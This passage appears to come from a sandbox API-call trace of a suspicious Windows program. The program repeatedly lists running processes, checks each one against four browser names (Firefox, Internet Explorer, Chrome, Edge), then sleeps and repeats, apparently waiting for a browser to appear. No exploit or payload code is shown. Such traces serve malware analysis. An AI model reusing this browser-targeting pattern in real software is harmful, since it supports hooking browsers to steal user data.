th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0198.841] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0198.841] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0198.841] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0198.841] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0198.841] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0198.841] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0198.841] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0198.841] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0198.842] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0198.842] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0198.842] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0198.842] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0198.842] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0198.842] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0198.842] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0198.843] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0198.843] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0198.843] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0198.843] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0198.843] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0198.844] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0198.844] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0198.844] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0198.844] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.844] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0198.844] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0198.844] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0198.844] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.845] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.845] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.845] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.845] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0198.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0198.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0198.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0198.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.846] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.847] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0198.847] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0198.847] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0198.847] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.909] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.909] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.909] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.909] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.909] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.909] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0198.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0198.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0198.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.911] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0198.911] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0198.911] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0198.911] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.911] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.911] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.911] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.911] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.912] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0198.913] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0198.914] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0198.914] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0198.914] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0198.914] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0198.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0198.914] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0198.914] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0198.914] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0198.914] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0198.915] CloseHandle (hObject=0xd4) returned 1 [0198.915] Sleep (dwMilliseconds=0x3e8) [0199.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0199.987] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.988] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0199.988] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0199.988] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0199.988] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0199.988] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.989] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0199.989] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0199.989] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0199.989] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0199.989] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.989] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0199.989] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0199.989] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0199.989] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.989] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.990] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0199.990] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0199.990] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0199.990] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.990] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.990] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0199.990] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0199.990] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0199.990] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.990] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.991] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0199.991] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0199.991] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0199.991] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.991] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.991] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0199.991] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0199.991] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0199.991] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.992] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0199.992] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0199.992] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0199.992] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.993] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.993] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0199.993] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0199.993] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.993] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.994] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.994] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.994] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.994] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.994] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.995] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.996] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.996] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.996] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.997] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0199.997] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0199.997] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0199.997] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.997] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.997] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.997] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.997] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.997] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.997] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.998] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.998] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.998] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.998] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.998] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.998] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0199.999] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0199.999] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0199.999] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.999] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 